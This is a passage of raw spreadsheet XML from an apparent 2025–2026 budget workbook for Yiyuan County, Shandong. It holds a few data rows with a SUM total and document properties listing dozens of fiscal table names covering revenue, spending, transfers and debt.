      <c r="B17" s="1141">
        <v>181</v>
      </c>
    </row>
    <row r="18" ht="26.1" customHeight="1" spans="1:2">
      <c r="A18" s="1134" t="s">
        <v>505</v>
      </c>
      <c r="B18" s="1141">
        <v>1041</v>
      </c>
    </row>
    <row r="19" ht="26.1" customHeight="1" spans="1:2">
      <c r="A19" s="1134" t="s">
        <v>506</v>
      </c>
      <c r="B19" s="1141">
        <v>125</v>
      </c>
    </row>
    <row r="20" ht="26.1" customHeight="1" spans="1:2">
      <c r="A20" s="1134" t="s">
        <v>507</v>
      </c>
      <c r="B20" s="1141">
        <v>349</v>
      </c>
    </row>
    <row r="21" ht="26.1" customHeight="1" spans="1:2">
      <c r="A21" s="1134" t="s">
        <v>508</v>
      </c>
      <c r="B21" s="1141">
        <v>12701</v>
      </c>
    </row>
    <row r="22" ht="26.1" customHeight="1" spans="1:2">
      <c r="A22" s="1136" t="s">
        <v>489</v>
      </c>
      <c r="B22" s="1137">
        <f>SUM(B5:B21)</f>
        <v>31180</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:B2"/>
    <mergeCell ref="A3:B3"/>
  </mergeCells>
  <pageMargins left="1.062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Company>MC SYSTEM</Company>
  <Application>Microsoft Excel</Application>
  <HeadingPairs>
    <vt:vector size="2" baseType="variant">
      <vt:variant>
        <vt:lpstr>工作表</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>83</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="83" baseType="lpstr">
      <vt:lpstr>SQTYELTOHBQOTP</vt:lpstr>
      <vt:lpstr>LFAFQGJ</vt:lpstr>
      <vt:lpstr>封皮</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>第一部分</vt:lpstr>
      <vt:lpstr>表1.2025年一般收入执行</vt:lpstr>
      <vt:lpstr>表2.2025年一般支出执行</vt:lpstr>
      <vt:lpstr>表3.2025年山东省对沂源县一般性转移支付及税收返还情况表</vt:lpstr>
      <vt:lpstr>表4.2025年山东省对沂源县专项转移支付情况表</vt:lpstr>
      <vt:lpstr>表5.2025年淄博市对沂源县一般性转移支付情况表</vt:lpstr>
      <vt:lpstr>表6.2025年淄博市对沂源县专项转移支付情况表</vt:lpstr>
      <vt:lpstr>表7.2025年基金收入执行</vt:lpstr>
      <vt:lpstr>表8.2025年基金支出执行</vt:lpstr>
      <vt:lpstr>表9.2025国有资本经营收入执行</vt:lpstr>
      <vt:lpstr>表10.2025国有资本经营支出执行 </vt:lpstr>
      <vt:lpstr>表11.2025年沂源县社会保险基金预算收入执行情况表</vt:lpstr>
      <vt:lpstr>表12.2025年沂源县社会保险基金预算支出执行情况表</vt:lpstr>
      <vt:lpstr>表13.2025年沂源县社会保险基金预算结余执行情况表</vt:lpstr>
      <vt:lpstr>第二部分</vt:lpstr>
      <vt:lpstr>表14.2025年县级一般收入执行</vt:lpstr>
      <vt:lpstr>表15.2025年县级一般支出执行</vt:lpstr>
      <vt:lpstr>表16.25年县对下税收返还及转移支付分项目分地区执行情况表</vt:lpstr>
      <vt:lpstr>表17.2025年县级基金收入执行 </vt:lpstr>
      <vt:lpstr>表18.2025年县级基金支出执行</vt:lpstr>
      <vt:lpstr>表19.县对下政府性基金预算转移支付分项目分地区表执行情况表</vt:lpstr>
      <vt:lpstr>表20.2025县级国有资本经营收入执行</vt:lpstr>
      <vt:lpstr>表21.2025县级国有资本经营支出执行 </vt:lpstr>
      <vt:lpstr>表22.县对下国有资本经营预算转移支付 分项目分地区预算表</vt:lpstr>
      <vt:lpstr>表23.2025年沂源县县级社会保险基金预算收入执行情况表 </vt:lpstr>
      <vt:lpstr>表24.2025年沂源县县级社会保险基金预算支出执行情况表 </vt:lpstr>
      <vt:lpstr>表25.2025年沂源县县级社会保险基金预算结余执行情况表</vt:lpstr>
      <vt:lpstr>第三部分</vt:lpstr>
      <vt:lpstr>表26.一般公共预算收入表</vt:lpstr>
      <vt:lpstr>表27.一般公共预算支出表</vt:lpstr>
      <vt:lpstr>表28.基金收入表</vt:lpstr>
      <vt:lpstr>表29.基金支出表</vt:lpstr>
      <vt:lpstr>表30.国有资本经营收入表</vt:lpstr>
      <vt:lpstr>表31.国有资本经营支出表</vt:lpstr>
      <vt:lpstr>表32.社保收入表 </vt:lpstr>
      <vt:lpstr>表33.社保支出表 </vt:lpstr>
      <vt:lpstr>表34.社保余额表 </vt:lpstr>
      <vt:lpstr>第四部分 </vt:lpstr>
      <vt:lpstr>表35.本级一般公共预算收入</vt:lpstr>
      <vt:lpstr>表36.本级一般公共预算支出</vt:lpstr>
      <vt:lpstr>表37.本级一般公共预算功能分类</vt:lpstr>
      <vt:lpstr>表38.县级一般预算基本支出经济</vt:lpstr>
      <vt:lpstr>表39.税收返还及一般预算分项目表</vt:lpstr>
      <vt:lpstr>表40.专项转移支付到项目</vt:lpstr>
      <vt:lpstr>表41.对下税收返还及转移支付分地区表</vt:lpstr>
      <vt:lpstr>表42.2026年沂源县对下转移支付分项目预算表</vt:lpstr>
      <vt:lpstr>表43.本级基金收入</vt:lpstr>
      <vt:lpstr>表44.本级基金支出</vt:lpstr>
      <vt:lpstr>表45.基金转移支付分项目</vt:lpstr>
      <vt:lpstr>表46.基金转移支付分地区</vt:lpstr>
      <vt:lpstr>表47.本级国有资本经营收入</vt:lpstr>
      <vt:lpstr>表48.本级国有资本经营支出</vt:lpstr>
      <vt:lpstr>表49.国资转移支付</vt:lpstr>
      <vt:lpstr>表50.本级社保收入表 </vt:lpstr>
      <vt:lpstr>表51.本级社保支出表</vt:lpstr>
      <vt:lpstr>表52.本级社保余额表</vt:lpstr>
      <vt:lpstr>第五部分  </vt:lpstr>
      <vt:lpstr>表53.限额余额表</vt:lpstr>
      <vt:lpstr>表54.一般债务余额情况</vt:lpstr>
      <vt:lpstr>表55.一般限额余额</vt:lpstr>
      <vt:lpstr>表56.专项债务余额情况</vt:lpstr>
      <vt:lpstr>表57.专项限额余额</vt:lpstr>
      <vt:lpstr>表58.上年发行情况</vt:lpstr>
      <vt:lpstr>表59.债券分年偿还计划</vt:lpstr>
      <vt:lpstr>表60.新增债券和政府外贷额度安排情况表</vt:lpstr>
      <vt:lpstr>表61.新增债券项目用途表</vt:lpstr>
      <vt:lpstr>表62.政府债券发行情况</vt:lpstr>
      <vt:lpstr>表63.债券发行及还本付息情况表</vt:lpstr>
      <vt:lpstr>表64.2026年沂源县债务收支计划</vt:lpstr>
      <vt:lpstr>表65.2026年本级债务收支计划</vt:lpstr>
      <vt:lpstr>第六部分</vt:lpstr>
      <vt:lpstr>表66.2025年沂源县财政专户管理资金收支执行情况表 </vt:lpstr>
      <vt:lpstr>表67.2026年沂源县财政专户管理资金收支计划预算表 </vt:lpstr>
      <vt:lpstr>表68.街道办收入草案表</vt:lpstr>
      <vt:lpstr>表69.街道办支出草案表</vt:lpstr>
      <vt:lpstr>第七部分</vt:lpstr>
      <vt:lpstr>40重大政策和重点项目等绩效目标</vt:lpstr>
      <vt:lpstr>2021年乡镇</vt:lpstr>
      <vt:lpstr>2021.12月报</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MC SYSTEM</dc:creator>
  <cp:lastModifiedBy>Administrator</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-02-13T05:15:00Z</dcterms:created>
  <cp:lastPrinted>2019-01-06T09:26:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-14T07:08:13Z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2052-11.1.0.9828</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>B8DABF79806C4350BDBAC551DDF89197_13</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOReadingLayout">
    <vt:bool>true</vt:bool>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="CalculationRule">
    <vt:i4>0</vt:i4>
  </property>
</Properties>
</file>